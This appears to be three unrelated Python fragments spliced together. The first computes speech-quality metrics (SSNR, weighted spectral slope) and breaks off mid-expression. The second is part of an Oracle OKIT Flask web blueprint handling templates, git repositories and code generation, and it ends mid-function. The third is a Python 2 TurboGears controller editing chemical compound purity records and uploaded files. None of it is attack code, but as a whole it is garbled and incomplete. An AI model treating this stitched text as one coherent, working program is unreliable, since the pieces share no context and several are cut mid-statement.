a[:i] = a_past[:i] - rcoeff[i] * a_past[::-1]
E[i+1] = (1-rcoeff[i]*rcoeff[i])*E[i]
acorr = np.array(R, dtype=np.float32)
refcoeff = np.array(rcoeff, dtype=np.float32)
a = a * -1
lpparams = np.array([1] + list(a), dtype=np.float32)
acorr =np.array(acorr, dtype=np.float32)
refcoeff = np.array(refcoeff, dtype=np.float32)
lpparams = np.array(lpparams, dtype=np.float32)
return acorr, refcoeff, lpparams
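# The loop above is the Levinson-Durbin recursion: each reflection coefficient is
#   k_i = (R[i+1] - sum_{j<i} a_j * R[i-j]) / E[i]
# and the prediction error updates as E[i+1] = (1 - k_i^2) * E[i].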
# -------------------------------------------------------------------------- #
# ---------------------- Speech Quality Metric ----------------------------- #
def PESQ(ref_wav, deg_wav):
rate = 16000
return pesq(rate, ref_wav, deg_wav, 'wb')
def SSNR(ref_wav, deg_wav, srate=16000, eps=1e-10):
""" Segmental Signal-to-Noise Ratio Objective Speech Quality Measure
This function implements the segmental signal-to-noise ratio
as defined in [1, p. 45] (see Equation 2.12).
"""
clean_speech = ref_wav
processed_speech = deg_wav
clean_length = ref_wav.shape[0]
processed_length = deg_wav.shape[0]
# scale both to have same dynamic range. Remove DC too.
clean_speech -= clean_speech.mean()
processed_speech -= processed_speech.mean()
processed_speech *= (np.max(np.abs(clean_speech)) / np.max(np.abs(processed_speech)))
# Signal-to-Noise Ratio
dif = ref_wav - deg_wav
overall_snr = 10 * np.log10(np.sum(ref_wav ** 2) / (np.sum(dif ** 2) +
10e-20))
# global variables
winlength = int(np.round(30 * srate / 1000)) # 30 msecs
skiprate = winlength // 4
MIN_SNR = -10
MAX_SNR = 35
# For each frame, calculate SSNR
num_frames = int(clean_length / skiprate - (winlength/skiprate))
start = 0
time = np.linspace(1, winlength, winlength) / (winlength + 1)
window = 0.5 * (1 - np.cos(2 * np.pi * time))
segmental_snr = []
for frame_count in range(int(num_frames)):
# (1) get the frames for the test and ref speech.
# Apply Hanning Window
clean_frame = clean_speech[start:start+winlength]
processed_frame = processed_speech[start:start+winlength]
clean_frame = clean_frame * window
processed_frame = processed_frame * window
# (2) Compute Segmental SNR
signal_energy = np.sum(clean_frame ** 2)
noise_energy = np.sum((clean_frame - processed_frame) ** 2)
segmental_snr.append(10 * np.log10(signal_energy / (noise_energy + eps)+ eps))
segmental_snr[-1] = max(segmental_snr[-1], MIN_SNR)
segmental_snr[-1] = min(segmental_snr[-1], MAX_SNR)
start += int(skiprate)
return overall_snr, segmental_snr
def wss(ref_wav, deg_wav, srate):
clean_speech = ref_wav
processed_speech = deg_wav
clean_length = ref_wav.shape[0]
processed_length = deg_wav.shape[0]
assert clean_length == processed_length, clean_length
winlength = round(30 * srate / 1000.) # 240 wlen in samples
skiprate = np.floor(winlength / 4)
max_freq = srate / 2
num_crit = 25 # num of critical bands
USE_FFT_SPECTRUM = 1
n_fft = int(2 ** np.ceil(np.log(2*winlength)/np.log(2)))
n_fftby2 = int(n_fft / 2)
Kmax = 20
Klocmax = 1
# Critical band filter definitions (Center frequency and BW in Hz)
cent_freq = [50., 120, 190, 260, 330, 400, 470, 540, 617.372,
703.378, 798.717, 904.128, 1020.38, 1148.30,
1288.72, 1442.54, 1610.70, 1794.16, 1993.93,
2211.08, 2446.71, 2701.97, 2978.04, 3276.17,
3597.63]
bandwidth = [70., 70, 70, 70, 70, 70, 70, 77.3724, 86.0056,
95.3398, 105.411, 116.256, 127.914, 140.423,
153.823, 168.154, 183.457, 199.776, 217.153,
235.631, 255.255, 276.072, 298.126, 321.465,
346.136]
bw_min = bandwidth[0] # min critical bandwidth
# set up critical band filters. Note here that Gaussianly shaped filters
# are used. Also, the sum of the filter weights are equivalent for each
# critical band filter. Filter less than -30 dB and set to zero.
min_factor = np.exp(-30. / (2 * 2.303)) # -30 dB point of filter
crit_filter = np.zeros((num_crit, n_fftby2))
all_f0 = []
for i in range(num_crit):
f0 = (cent_freq[i] / max_freq) * (n_fftby2)
all_f0.append(np.floor(f0))
bw = (bandwidth[i] / max_freq) * (n_fftby2)
norm_factor = np.log(bw_min) - np.log(bandwidth[i])
j = list(range(n_fftby2))
crit_filter[i, :] = np.exp(-11 * (((j - np.floor(f0)) / bw) ** 2) + \
norm_factor)
crit_filter[i, :] = crit_filter[i, :] * (crit_filter[i, :] > \
min_factor)
# For each frame of input speech, compute Weighted Spectral Slope Measure
num_frames = int(clean_length / skiprate - (winlength / skiprate))
start = 0 # starting sample
time = np.linspace(1, winlength, winlength) / (winlength + 1)
window = 0.5 * (1 - np.cos(2 * np.pi * time))
distortion = []
for frame_count in range(num_frames):
# (1) Get the Frames for the test and reference speech.
# Multiply by Hanning window.
clean_frame = clean_speech[start:start+winlength]
processed_frame = processed_speech[start:start+winlength]
clean_frame = clean_frame * window
processed_frame = processed_frame * window
# (2) Compute Power Spectrum of clean and processed
clean_spec = (np.abs(np.fft.fft(clean_frame, n_fft)) ** 2)
processed_spec = (np.abs(np.fft.fft(processed_frame, n_fft)) ** 2)
clean_energy = [None] * num_crit
processed_energy = [None] * num_crit
# (3) Compute Filterbank output energies (in dB)
for i in range(num_crit):
clean_energy[i] = np.sum(clean_spec[:n_fftby2] * \
crit_filter[i, :])
processed_energy[i] = np.sum(processed_spec[:n_fftby2] * \
crit_filter[i, :])
clean_energy = np.array(clean_energy).reshape(-1, 1)
eps = np.ones((clean_energy.shape[0], 1)) * 1e-10
clean_energy = np.concatenate((clean_energy, eps), axis=1)
clean_energy = 10 * np.log10(np.max(clean_energy, axis=1))
processed_energy = np.array(processed_energy).reshape(-1, 1)
processed_energy = np.concatenate((processed_energy, eps), axis=1)
processed_energy = 10 * np.log10(np.max(processed_energy, axis=1))
# (4) Compute Spectral Shape (dB[i+1] - dB[i])
clean_slope = clean_energy[1:num_crit] - clean_energy[:num_crit-1]
processed_slope = processed_energy[1:num_crit] - \
processed_energy[:num_crit-1]
# (5) Find the nearest peak locations in the spectra to each
# critical band. If the slope is negative, we search
# to the left. If positive, we search to the right.
clean_loc_peak = []
processed_loc_peak = []
for i in range(num_crit - 1):
if clean_slope[i] > 0:
# search to the right
n = i
while n < num_crit - 1 and clean_slope[n] > 0:
n += 1
clean_loc_peak.append(clean_energy[n - 1])
else:
# search to the left
n = i
while n >= 0 and clean_slope[n] <= 0:
n -= 1
clean_loc_peak.append(clean_energy[n + 1])
# find the peaks in the processed speech signal
if processed_slope[i] > 0:
n = i
while n < num_crit - 1 and processed_slope[n] > 0:
n += 1
processed_loc_peak.append(processed_energy[n - 1])
else:
n = i
while n >= 0 and processed_slope[n] <= 0:
n -= 1
processed_loc_peak.append(processed_energy[n + 1])
# (6) Compute the WSS Measure for this frame. This includes
# determination of the weighting function
dBMax_clean = max(clean_energy)
dBMax_processed = max(processed_energy)
# The weights are calculated by averaging individual
# weighting factors from the clean and processed frame.
# These weights W_clean and W_processed should range
# from 0 to 1 and place more emphasis on spectral
# peaks and less emphasis on slope differences in spectral
# valleys. This procedure is described on page 1280 of
# Klatt's 1982 ICASSP paper.
clean_loc_peak = np.array(clean_loc_peak)
processed_loc_peak = np.array(processed_loc_peak)
Wmax_clean = Kmax / (Kmax + dBMax_clean - clean_energy[:num_crit-1])
Wlocmax_clean = Klocmax / (Klocmax + clean_loc_peak - \
clean_energy[:num_crit-1])
W_clean = Wmax_clean * Wlocmax_clean
Wmax_processed = Kmax / (Kmax + dBMax_processed - \
processed_energy[:num_crit-1])
Wlocmax_processed = Klocmax | |
# davidkhala/oci-designer-toolk
# Copyright (c) 2020, 2021, Oracle and/or its affiliates.
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
"""Provide Module Description
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
__author__ = ["<NAME> (Oracle Cloud Solutions A-Team)"]
__version__ = "1.0.0"
__module__ = "okitWebDesigner"
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
import configparser
import functools
import oci
import os
import shutil
import tempfile
import time
import urllib
import giturlparse
import glob
import ast
from git import Repo
from flask import Blueprint
from flask import current_app
from flask import jsonify
from flask import redirect
from flask import render_template
from flask import request
from flask import send_from_directory
from flask import session
from flask import url_for
import json
from common.okitCommon import jsonToFormattedString
from common.okitCommon import logJson
from common.okitCommon import readJsonFile
from common.okitCommon import standardiseIds
from common.okitCommon import writeJsonFile
from common.okitLogging import getLogger
from model.okitValidation import OCIJsonValidator
from generators.okitAnsibleGenerator import OCIAnsibleGenerator
from generators.okitTerraform11Generator import OCITerraform11Generator
from generators.okitTerraformGenerator import OCITerraformGenerator
from generators.okitResourceManagerGenerator import OCIResourceManagerGenerator
from generators.okitMarkdownGenerator import OkitMarkdownGenerator
# Configure logging
logger = getLogger()
bp = Blueprint('okit', __name__, url_prefix='/okit', static_folder='static/okit')
debug_mode = str(os.getenv('DEBUG_MODE', 'False')).title() == 'True'
template_root = '/okit/visualiser/templates'
def standardiseJson(json_data={}, **kwargs):
logJson(json_data)
json_data = standardiseIds(json_data)
logJson(json_data)
return json_data
def readConfigFileSections(config_file='~/.oci/config'):
if os.getenv('OCI_CLI_AUTH', 'config') != 'instance_principal':
logger.debug('Config File {0!s:s}'.format(config_file))
abs_config_file = os.path.expanduser(config_file)
logger.debug('Config File {0!s:s}'.format(abs_config_file))
config = configparser.ConfigParser()
config.read(abs_config_file)
config_sections = []
if 'DEFAULT' in config:
config_sections = ['DEFAULT']
config_sections.extend(config.sections())
logger.info('Config Sections {0!s:s}'.format(config_sections))
else:
config_sections = ['Instance Principal']
return config_sections
def readGitConfigFile(config_file='~/.oci/git_repositories'):
logger.debug('Setting File {0!s:s}'.format(config_file))
abs_config_file = os.path.expanduser(config_file)
logger.debug('Setting File {0!s:s}'.format(abs_config_file))
config = configparser.ConfigParser()
config.read(abs_config_file)
repo_list = []
for each_git_section in config.sections():
repo_list.append({'label': each_git_section, 'branch': config[each_git_section]['branch'], 'url': config[each_git_section]['url']})
logger.info(repo_list)
return repo_list
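# Illustrative sketch only (the section name, URL and branch below are hypothetical, not part of
# this repository): readGitConfigFile() expects an INI file at ~/.oci/git_repositories in which
# every section describes one repository via 'url' and 'branch' keys, e.g.:
#
#   [example-templates]
#   url = https://github.com/example-org/okit-templates.git
#   branch = main
#
# Each section is returned as {'label': '<section>', 'branch': '...', 'url': '...'}.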
def getConfigFileValue(section, key, config_file='~/.oci/config'):
value = ''
if os.getenv('OCI_CLI_AUTH', 'config') != 'instance_principal':
logger.debug('Config File {0!s:s}'.format(config_file))
abs_config_file = os.path.expanduser(config_file)
logger.debug('Config File {0!s:s}'.format(abs_config_file))
config = configparser.ConfigParser()
config.read(abs_config_file)
value = config[section][key]
return value
def validateConfigFile(config_file='~/.oci/config'):
results = []
if os.getenv('OCI_CLI_AUTH', 'config') != 'instance_principal':
logger.debug('Config File {0!s:s}'.format(config_file))
abs_config_file = os.path.expanduser(config_file)
logger.debug('Config File {0!s:s}'.format(abs_config_file))
config = configparser.ConfigParser()
config.read(abs_config_file)
if len(config.sections()) == 0 and 'DEFAULT' not in config:
results.append('OCI Connect Config file is either missing or empty.')
else:
for section in config:
key_file = config[section]['key_file']
if not os.path.exists(os.path.expanduser(key_file)):
results.append('[{0!s:s}] Key File {1!s:s} does not exist.'.format(section, key_file))
logger.info(results)
return results
#
# Define Error Handlers
#
@bp.errorhandler(Exception)
def handle_exception(error):
message = [str(x) for x in error.args]
status_code = 500
success = False
response = {
'success': success,
'error': {
'type': error.__class__.__name__,
'message': message
}
}
logger.exception(error)
logJson(response)
return jsonify(response), status_code
#
# Define Endpoints
#
@bp.route('/designer', methods=(['GET']))
def designer():
local = current_app.config.get('LOCAL', False)
if not local and session.get('username', None) is None:
logger.info('<<<<<<<<<<<<<<<<<<<<<<<<< Redirect to Login >>>>>>>>>>>>>>>>>>>>>>>>>')
return redirect(url_for('okit.login'), code=302)
# Test if developer mode
developer_mode = (request.args.get('developer', default='false') == 'true')
if developer_mode:
logger.info("<<<<<<<<<<<<<<<<<<<<<<<<<< Developer Mode >>>>>>>>>>>>>>>>>>>>>>>>>>")
# Test if experimental mode
experimental_mode = (request.args.get('experimental', default='false') == 'true')
if experimental_mode:
logger.info("<<<<<<<<<<<<<<<<<<<<<<<<<< Experimental Mode >>>>>>>>>>>>>>>>>>>>>>>>>>")
# Test if cd3 mode
cd3_mode = (request.args.get('cd3', default='false') == 'true')
if cd3_mode:
logger.info("<<<<<<<<<<<<<<<<<<<<<<<<<< CD3 Mode >>>>>>>>>>>>>>>>>>>>>>>>>>")
# Test if PCA mode
pca_mode = (request.args.get('pca', default='false') == 'true')
if pca_mode:
logger.info("<<<<<<<<<<<<<<<<<<<<<<<<<< PCA Mode >>>>>>>>>>>>>>>>>>>>>>>>>>")
# Test if A2C mode
a2c_mode = (request.args.get('a2c', default='false') == 'true')
if a2c_mode:
logger.info("<<<<<<<<<<<<<<<<<<<<<<<<<< A2C Mode >>>>>>>>>>>>>>>>>>>>>>>>>>")
# Test if Ansible mode
ansible_mode = (request.args.get('ansible', default='false') == 'true')
if ansible_mode:
logger.info("<<<<<<<<<<<<<<<<<<<<<<<< Ansible Mode >>>>>>>>>>>>>>>>>>>>>>>>")
# Read Artifact Model Specific JavaScript Files
artefact_model_js_files = sorted(os.listdir(os.path.join(bp.static_folder, 'model', 'js', 'artefacts')))
# Read Artifact View Specific JavaScript Files
if os.path.exists(os.path.join(bp.static_folder, 'view', 'js', 'artefacts')) and os.path.isdir(os.path.join(bp.static_folder, 'view', 'js', 'artefacts')):
artefact_view_js_files = sorted(os.listdir(os.path.join(bp.static_folder, 'view', 'js', 'artefacts')))
else:
artefact_view_js_files = []
artefact_view_js_files.extend(sorted(os.listdir(os.path.join(bp.static_folder, 'view', 'designer', 'js', 'artefacts'))))
# Read Pallete Json
palette_json = readJsonFile(os.path.join(bp.static_folder, 'palette', 'palette.json'))
# # Get Palette Icon Groups / Icons
# svg_files = []
# svg_icon_groups = {}
# # Read Files
# for (dirpath, dirnames, filenames) in os.walk(os.path.join(bp.static_folder, 'palette')):
# logger.debug('dirpath : {0!s:s}'.format(dirpath))
# logger.debug('dirnames : {0!s:s}'.format(dirnames))
# logger.debug('filenames : {0!s:s}'.format(filenames))
# if os.path.basename(dirpath) != 'palette':
# svg_files.extend([os.path.join(os.path.basename(dirpath), f) for f in filenames if f.endswith(".svg")])
# svg_icon_groups[os.path.basename(dirpath)] = [f for f in filenames if f.endswith(".svg")]
# else:
# svg_files.extend([f for f in filenames if f.endswith(".svg")])
# logger.debug('Files Walk : {0!s:s}'.format(svg_files))
# logger.debug('SVG Icon Groups {0!s:s}'.format(svg_icon_groups))
# palette_icon_groups = []
# for key in sorted(svg_icon_groups.keys()):
# palette_icon_group = {'name': str(key).title(), 'icons': []}
# for palette_svg in sorted(svg_icon_groups[key]):
# palette_icon = {'svg': os.path.join(key, palette_svg), 'title': os.path.basename(palette_svg).split('.')[0].replace('_', ' ')}
# palette_icon_group['icons'].append(palette_icon)
# palette_icon_groups.append(palette_icon_group)
# logger.debug('Palette Icon Groups : {0!s:s}'.format(palette_icon_groups))
# logJson(palette_icon_groups)
config_sections = {"sections": readConfigFileSections()}
#Render The Template
return render_template('okit/okit_designer.html',
artefact_model_js_files=artefact_model_js_files,
artefact_view_js_files=artefact_view_js_files,
palette_json=palette_json,
# palette_icon_groups=palette_icon_groups,
# fragment_icons=fragment_icons,
# okit_templates_groups=template_groups,
# okit_template_categories=template_categories,
local_okit=local,
developer_mode=developer_mode, experimental_mode=experimental_mode, cd3_mode=cd3_mode, a2c_mode=a2c_mode, pca_mode=pca_mode, ansible_mode=ansible_mode)
# Template Processing
@bp.route('/panel/templates', methods=(['GET']))
def templates_panel():
# ref_arch_root = os.path.join(bp.static_folder, 'templates', 'reference_architecture')
ref_arch_root = os.path.join(current_app.instance_path, 'templates', 'reference_architecture')
ref_arch_templates = dir_to_json(ref_arch_root, current_app.instance_path, 'children', 'templates')
# ref_arch_templates = dir_to_json(ref_arch_root, ref_arch_root, 'children', 'templates')
ref_arch_category = {'name': 'Reference Architectures', 'path': 'reference_architecture', 'children': [], 'templates': []}
ref_arch_category = hierarchy_category(ref_arch_category, ref_arch_templates, current_app.instance_path)
# user_root = os.path.join('okit', 'templates', 'user')
user_root = os.path.join(current_app.instance_path, 'templates', 'user')
user_templates = dir_to_json(user_root, current_app.instance_path, 'children', 'templates')
# user_templates = dir_to_json(user_root, user_root, 'children', 'templates')
user_category = {'name': 'User', 'path': 'user', 'children': [], 'templates': []}
user_category = hierarchy_category(user_category, user_templates, current_app.instance_path)
template_categories = [ref_arch_category, user_category]
logger.debug(f'Template Categories : {jsonToFormattedString(template_categories)}')
#Render The Template
return render_template('okit/templates_panel.html', template_categories=template_categories)
def dir_to_json(rootdir, reltodir=None, dkey='dirs', fkey='files'):
# logger.info(f'Root Path: {rootdir}')
# logger.info(f'Relative to Path: {reltodir}')
# logger.info(f'Relative Path: {os.path.relpath(rootdir, reltodir)}')
hierarchy = {
'id': os.path.relpath(rootdir, reltodir).replace('/','_'),
'name': os.path.basename(rootdir),
'path': rootdir
}
hierarchy[dkey] = []
hierarchy[fkey] = []
if reltodir is not None:
hierarchy['path'] = os.path.relpath(rootdir, reltodir)
with os.scandir(rootdir) as it:
for entry in it:
if not entry.name.startswith('.'):
if entry.name.endswith('.json') and entry.is_file():
# hierarchy[fkey].append(entry.name)
hierarchy[fkey].append({'id': entry.name.replace('.','_'), 'name': entry.name, 'json': entry.name, 'path': hierarchy['path']})
elif entry.is_dir():
hierarchy[dkey].append(dir_to_json(os.path.join(rootdir, entry.name), reltodir, dkey, fkey))
logger.debug(f'Directory Hierarchy : {jsonToFormattedString(hierarchy)}')
return hierarchy
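# Illustrative sketch of the structure dir_to_json() returns (the 'demo.json' template below is a
# hypothetical example, not shipped with the repository). For <instance>/templates/user/demo.json,
# dir_to_json('<instance>/templates/user', '<instance>', 'children', 'templates') yields roughly:
#
#   {
#       "id": "templates_user", "name": "user", "path": "templates/user",
#       "children": [],
#       "templates": [{"id": "demo_json", "name": "demo.json", "json": "demo.json", "path": "templates/user"}]
#   }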
def hierarchy_category(category, hierarchy, root=''):
logger.debug(f'Category : {jsonToFormattedString(category)}')
logger.debug(f'Hierarchy : {jsonToFormattedString(hierarchy)}')
logger.debug(f'Root : {root}')
for template in hierarchy['templates']:
path = hierarchy['path'] if hierarchy['path'] != '.' else ''
category['templates'].append(get_template_entry(root, path, template['json']))
for child in hierarchy['children']:
category['children'].append(hierarchy_category({"name": os.path.basename(child["path"]).replace("_", " ").title(), "path": child["path"], "id": child["id"], "children": [], "templates": []}, child, root))
return category
def get_template_entry(root, path, json_file):
# json_file = os.path.join(path, template_file)
okit_template = {'path': path, 'json': json_file, 'id': json_file.replace('.', '_').replace('/', '_')}
try:
filename = os.path.join(root, okit_template['path'], okit_template['json'])
template_json = readJsonFile(filename)
logger.debug('Template Json : {0!s:s}'.format(template_json))
okit_template['name'] = template_json['title']
okit_template['description'] = template_json.get('description', template_json['title'])
except Exception as e:
logger.debug(e)
return okit_template
@bp.route('/templates/load', methods=(['GET']))
def templates():
if request.method == 'GET':
query_string = request.query_string
parsed_query_string = urllib.parse.unquote(query_string.decode())
query_json = json.loads(parsed_query_string)
templates_root = os.path.join(current_app.instance_path, query_json['root_dir'].strip('/'))
templates = dir_to_json(templates_root, current_app.instance_path)
logger.debug(f'Templates : {jsonToFormattedString(templates)}')
return templates
@bp.route('/template/load', methods=(['GET']))
def template_load():
if request.method == 'GET':
query_string = request.query_string
parsed_query_string = urllib.parse.unquote(query_string.decode())
query_json = json.loads(parsed_query_string)
template_file = query_json['template_file']
return send_from_directory(current_app.instance_path, template_file, mimetype='application/json', as_attachment=False)
@bp.route('/template/save', methods=(['POST']))
def template_save():
if request.method == 'POST':
instance_path = current_app.instance_path
root_dir = request.json["root_dir"].strip('/')
template_filename = request.json["template_file"].strip('/')
okit_json = request.json["okit_json"]
git = request.json.get('git', False)
git_commit_msg = request.json.get('git_commit_msg', '')
logger.info(f'Save Template : {root_dir}')
template_dir = os.path.dirname(template_filename)
full_dir = os.path.join(instance_path, root_dir, template_dir)
full_filename = os.path.join(full_dir, os.path.basename(template_filename))
full_filename = os.path.join(instance_path, root_dir, template_filename)
if not os.path.exists(full_dir):
os.makedirs(full_dir, exist_ok=True)
writeJsonFile(okit_json, full_filename)
if git:
top_dir = os.path.normpath(os.path.dirname(template_filename)).split(os.sep)
git_repo_dir = os.path.join(instance_path, root_dir, top_dir[0], top_dir[1])
# while top_dir != '':
# git_repo_dir = os.path.join(instance_path, root_dir, top_dir)
# logger.info(f'Top Dir : {top_dir}')
# top_dir = os.path.dirname(top_dir)
logger.info(f'Git Root Dir : {git_repo_dir}')
repo = Repo(git_repo_dir)
repo.index.add(full_filename)
repo.index.commit("commit changes from okit:" + git_commit_msg)
repo.remotes.origin.pull()
repo.remotes.origin.push()
return template_filename
# Git Processing
@bp.route('/panel/git', methods=(['GET']))
def git_panel():
if request.method == 'GET':
repositories = readGitConfigFile()
git_resources = {}
for repo in repositories:
logger.debug(f'Repo: {jsonToFormattedString(repo)}')
label = repo['label']
branch = repo['branch']
url = repo['url']
parsed_url = giturlparse.parse(url)
logger.debug(f'Parsed Url: {parsed_url}')
git_resource_dir = os.path.join(current_app.instance_path, 'git', parsed_url.resource)
git_repo_dir = os.path.join(git_resource_dir, parsed_url.name)
try:
if os.path.exists(git_repo_dir):
repo = Repo(git_repo_dir)
repo.remotes.origin.pull()
else:
repo = Repo.clone_from(url, git_repo_dir, branch=branch, no_single_branch=True)
repo.remotes.origin.pull()
except Exception as e:
logger.exception(e)
git_resources[parsed_url.resource] = git_resource_dir
git_repositories = []
for git_resource, git_resource_dir in git_resources.items():
repo_templates = dir_to_json(git_resource_dir, current_app.instance_path, 'children', 'templates')
repository = {'name': git_resource, 'path': git_resource_dir, 'children': [], 'templates': []}
git_repositories.append(repo_templates)
#Render The Template
logger.debug(f'Repository: {jsonToFormattedString(git_repositories)}')
return render_template('okit/git_repositories_panel.html', git_repositories=git_repositories)
# Local Filesystem Processing
@bp.route('/panel/local', methods=(['GET']))
def local_panel():
if request.method == 'GET':
local_filesystem_dir = os.path.join(current_app.instance_path, 'local')
local_filesystem = [dir_to_json(local_filesystem_dir, current_app.instance_path, 'children', 'templates')]
#Render The Template
logger.debug(f'Local Filesystem: {jsonToFormattedString(local_filesystem)}')
return render_template('okit/local_panel.html', local_filesystem=local_filesystem)
@bp.route('/propertysheets/<string:sheet>', methods=(['GET']))
def propertysheets(sheet):
return render_template('okit/propertysheets/{0:s}'.format(sheet))
@bp.route('/valueproposition/<string:sheet>', methods=(['GET']))
def valueproposition(sheet):
return render_template('okit/valueproposition/{0:s}'.format(sheet))
@bp.route('/generate/<string:language>/<string:destination>', methods=(['GET', 'POST']))
def generate(language, destination):
logger.info('Language : {0:s} - {1:s}'.format(str(language), str(request.method)))
logger.info('Destination : {0:s} - {1:s}'.format(str(destination), str(request.method)))
logger.debug('JSON : {0:s}'.format(str(request.json)))
if request.method == 'POST':
use_vars = request.json.get("use_variables", True)
try:
if destination == 'git':
git_url, git_branch = request.json['git_repository'].split('*')
parsed_git_url = giturlparse.parse(git_url)
generate_git_dir = os.path.abspath(os.path.join(bp.static_folder, 'git'))
logger.info(generate_git_dir)
if not os.path.exists(generate_git_dir):
                    os.makedirs(generate_git_dir, exist_ok=True)
if kw.has_key('state') and kw['state'] != u'':
try:
state = str(kw['state'])
state = state.replace(',', '.')
except Exception as msg:
flash(l_(u'Float required: %s' % msg), 'error')
redirect(request.headers['Referer'])
if scompound.state != float(state):
scompound.state = float(state)
schanges += u'; State.[mg]: ' + kw['state']
else:
scompound.state = 0
if kw.has_key('notes') and kw['notes'] != scompound.notes:
scompound.notes = kw['notes']
schanges += u';Notes: ' + kw['notes']
if kw.has_key('priority') and int(kw['priority']) != scompound.priority:
scompound.priority = int(kw['priority'])
schanges += u'; Priority:' + kw['priority']
pcompound = DBSession.query(PCompound).get(scompound.pid)
if pcompound:
pcompound.priority = int(kw['priority'])
phistory = PHistory()
phistory.project = pname
phistory.date = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
phistory.user = userid
phistory.status = 'Priority'
phistory.changes = u'Priority: ' + kw['priority']
pcompound.history += [phistory]
DBSession.add(phistory)
try:
reason = kw['reason']
except Exception:
reason = None
pass
if reason and reason != u'':
schanges += u'Warning! Non standard change for the reason:' + reason
new_etap = int(kw['etap'])
new_etap_max = int(kw['etap_max'])
effort = DBSession.query( Efforts ).get(scompound.effort_default)
if new_etap < new_etap_max:
effort.etap = new_etap
effort.etap_max = new_etap_max
scompound.status = DBSession.query( SStatus ).get(2)
scompound.stat2_date = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
schanges += u'; Current phase: ' + str(new_etap)
schanges += u'; Number of Phases: ' + str(new_etap_max)
else:
flash(l_(u'Finished etap should be lower than amount of etaps'), 'error')
redirect(request.headers['Referer'])
try:
if kw.has_key('acid'):
kwas = str(kw['acid'])
else:
kwas = str(kw['kwasowa'])
kwas = kwas.replace(',', '.')
kwas = float(kwas)
if kw.has_key('basic'):
zasada = str(kw['basic'])
else:
zasada = str(kw['zasadowa'])
zasada = zasada.replace(',', '.')
zasada = float(zasada)
except Exception as msg:
kwas = None
zasada = None
if scompound.purity:
if scompound.purity[0].type == 'kwasowa' or scompound.purity[0].type == 'acid':
kpurity = scompound.purity[0]
zpurity = scompound.purity[1]
else:
kpurity = scompound.purity[1]
zpurity = scompound.purity[0]
            # if not has_permission('odbiorca'):
            #     flash(l_(u'Permission denied'), 'warning')
            #     redirect(request.headers['Referer'])
            if kwas and kwas >= 0.0:
if kpurity.type == 'kwasowa' or kpurity.type == 'acid':
if kpurity.value != kwas:
kpurity.value = kwas
schanges += u'; Acid Purity: ' + str(kwas)
try:
kwas_file = raw_path_basename(kw['file_acid'].filename)
except Exception as msg:
kwas_file = None
pass
if kwas_file:
number = DBSession.query(SFiles).count() + 1
new_kwas_file_name = str(number) + '_' + userid + '_' + str(id) + '_' + kwas_file
new_kwas_file_name.replace(' ', '_')
f_path = os.path.join(files_dir, new_kwas_file_name)
try:
f = file(f_path, "w")
f.write(kw['file_acid'].value)
f.close()
except Exception as msg:
flash(l_(msg), 'error')
redirect(request.headers['Referer'])
sfile1 = SFiles()
sfile1.name = kwas_file
sfile1.filename = new_kwas_file_name
                        schanges += '; File for acid analytics: ' + kwas_file + ' (' + new_kwas_file_name + ')'
kpurity.filename = [sfile1]
DBSession.add(sfile1)
if zasada and zasada >= 0.0:
if zpurity.type == 'zasadowa' or zpurity.type == 'basic':
if zpurity.value != zasada:
zpurity.value = zasada
schanges += u'; Basic Purity: ' + str(zasada)
try:
zasada_file = raw_path_basename(kw['file_basic'].filename)
except Exception as msg:
zasada_file = None
pass
if zasada_file:
number = DBSession.query(SFiles).count() + 1
new_zasada_file_name = str(number) + '_' + userid + '_' + str(id) + '_' + zasada_file
new_zasada_file_name.replace(' ', '_')
f_path = os.path.join(files_dir, new_zasada_file_name)
try:
f = file(f_path, "w")
f.write(kw['file_basic'].value)
f.close()
except Exception as msg:
flash(l_(msg), 'error')
redirect(request.headers['Referer'])
sfile2 = SFiles()
sfile2.name = zasada_file
sfile2.filename = new_zasada_file_name
                        schanges += '; File for basic analytics: ' + zasada_file + ' (' + new_zasada_file_name +')'
zpurity.filename = [sfile2]
DBSession.add(sfile2)
try:
filename = raw_path_basename(kw['loadfile'].filename)
except Exception as msg:
filename = None
pass
if filename:
number = DBSession.query(SFiles).count() + 1
newfilename = str(number) + '_' + userid + '_' + str(sid) + '_' + filename
newfilename.replace(' ', '_')
f_path = os.path.join(files_dir, newfilename)
try:
f = file(f_path, "w")
f.write(kw['loadfile'].value)
f.close()
except Exception as msg:
flash(l_(msg), 'error')
redirect(request.headers['Referer'])
sfile = SFiles()
sfile.name = filename
sfile.filename = newfilename
if kw['opis']:
sfile.description = kw['opis']
schanges += u' File: ' + filename + u' ( ' + newfilename + u' )'
DBSession.add(sfile)
shistory.changes = schanges
scompound.history += [shistory]
DBSession.add(shistory)
DBSession.flush()
#transaction.commit()
scompound2 = DBSession.query(SCompound).filter_by(id=sid).join(SCompound.mol).filter(Compound.project.any(Projects.name==pname)).first()
if filename:
sfile2 = [sfile]
sfile2 += scompound2.filename
scompound2.filename = sfile2
flash(l_(u'Task completed successfully'))
else:
shistory.changes = schanges
scompound.history += [shistory]
DBSession.add(shistory)
DBSession.flush()
flash(l_(u'task completed successfully'))
else:
flash(l_(u'Permission denied'), 'warning')
redirect(request.headers['Referer'])
if kw and kw.has_key('come_from'):
come_from = kw['come_from']
else:
come_from = request.headers['Referer']
redirect(come_from)
@expose()
def delfile(self, *args, **kw):
pname = request.environ['PATH_INFO'].split('/')[1]
userid = request.identity['repoze.who.userid']
file_id = int(args[0])
sid = int(args[1])
scompound = DBSession.query(SCompound).filter_by(id=sid).join(SCompound.mol).filter(Compound.project.any(Projects.name==pname)).first()
if scompound.owner == userid:
shistory = SHistory()
shistory.gid = scompound.mol.gid
shistory.project = pname
shistory.date = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
shistory.user = userid
shistory.status = u'Delete File'
file = DBSession.query(SFiles).get(file_id)
shistory.changes = u'Deleted file: %s (%s)' % (file.name, file.filename)
scompound.history += [shistory]
scompound.filename.remove(file)
DBSession.delete(file)
DBSession.add(shistory)
else:
flash(l_(u'Permission denied'), 'warning')
redirect(request.headers['Referer'])
flash(l_(u'Task completed successfully'))
